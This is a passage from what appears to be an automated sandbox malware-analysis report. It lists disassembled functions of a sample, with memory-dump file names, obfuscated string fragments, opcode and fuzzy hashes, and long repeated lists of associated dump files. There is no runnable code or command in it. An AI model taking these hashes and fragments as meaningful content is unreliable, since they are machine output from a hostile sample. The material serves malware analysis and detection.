                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "ub$2yb$3768$:?-)$InA>$i7b0$~x||
                                                                        • API String ID: 0-2698113861
                                                                        • Opcode ID: 0a3566d794183ef0f2297c5e83fc709cbf81282cbb40ac849f29bd8d6248d769
                                                                        • Instruction ID: 4ab39cc8baa6ee177113f246e1ee8b3ff848d6bd37106b6feebeca9239bba447
                                                                        • Opcode Fuzzy Hash: 0a3566d794183ef0f2297c5e83fc709cbf81282cbb40ac849f29bd8d6248d769
                                                                        • Instruction Fuzzy Hash: 6B321376A08722CFD314CF28DC90A6AB7E2FF89310F19996CE98597390D735E951CB81
                                                                        Function 0061ED48 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: [lT$ a$?c;}$iX)$ij$ZlT$]Z[
                                                                        • API String ID: 0-51037172
                                                                        • Opcode ID: 8541c8889cd5ce702a262321060a9291cbc9dc34d3aaca85eccb3d36cecf5360
                                                                        • Instruction ID: 5855b2157a33210b4e08d9e0012d944e815bbac0b5644e65a240bc0ec06512ae
                                                                        • Opcode Fuzzy Hash: 8541c8889cd5ce702a262321060a9291cbc9dc34d3aaca85eccb3d36cecf5360
                                                                        • Instruction Fuzzy Hash: D032DFB0600701CFC724CF29C491666BBF2FF95314B19CAADD4968BB96D734E886CB90
                                                                        Function 007DAA58 Relevance: 9.1, Strings: 6, Instructions: 1621COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %bo$&Gsg$3Pow$4y7}$EU?$Gp-H
                                                                        • API String ID: 0-1087187141
                                                                        • Opcode ID: 942377bcc119ea031685d693528bee61db9e6e38fef316511fb8894a93e56e10
                                                                        • Instruction ID: d472e94c9c3586b1a3b42c0ffed875eeccb7aca0104754e59824ac5f2d3d4896
                                                                        • Opcode Fuzzy Hash: 942377bcc119ea031685d693528bee61db9e6e38fef316511fb8894a93e56e10
                                                                        • Instruction Fuzzy Hash: A2B2F4F360C2049FE3046E29EC8567AFBE9EF94720F1A493DE6C4C3744EA3598458697
                                                                        Function 0060DA80 Relevance: 9.1, Strings: 7, Instructions: 355COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7CB170F54527605EE227D36909F09D60$@ffI$itkj$q`h}$xy$yleh$uw
                                                                        • API String ID: 0-539617692
                                                                        • Opcode ID: 1a457511c59e250ae7160f10643c6564ef4a54d2931079a2dba519d1439760b1
                                                                        • Instruction ID: 2bea78e0be67ecbcf26a51762258116f108e28fa0da0ed2289478b7b152c6d39
                                                                        • Opcode Fuzzy Hash: 1a457511c59e250ae7160f10643c6564ef4a54d2931079a2dba519d1439760b1
                                                                        • Instruction Fuzzy Hash: 2DC1EFB02483849FE314DF65D88176FBBE5EBD6308F14892CE1D58B392D7788909CB96
                                                                        Function 006308B1 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 285COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(C5A2897E), ref: 00630B86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: lcw|<a$o~{q$w|<a${{up
                                                                        • API String ID: 3664257935-3972657743
                                                                        • Opcode ID: 7f5f3743fa8e10d2c8cefcb14c352433fc5e259f0d867146d4c7f7523f0f2715
                                                                        • Instruction ID: 17fd4b15be1da0e332133ced1159e02a981a1b4dad4dd0375a0aa4a5aa9361f4
                                                                        • Opcode Fuzzy Hash: 7f5f3743fa8e10d2c8cefcb14c352433fc5e259f0d867146d4c7f7523f0f2715
                                                                        • Instruction Fuzzy Hash: 5FA147702447428BE3258F24C8A17A3FBA3FF95314F28865DD4A60B7D2D776E90AC791
                                                                        Function 007E1CD1 Relevance: 8.5, Strings: 6, Instructions: 1015COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
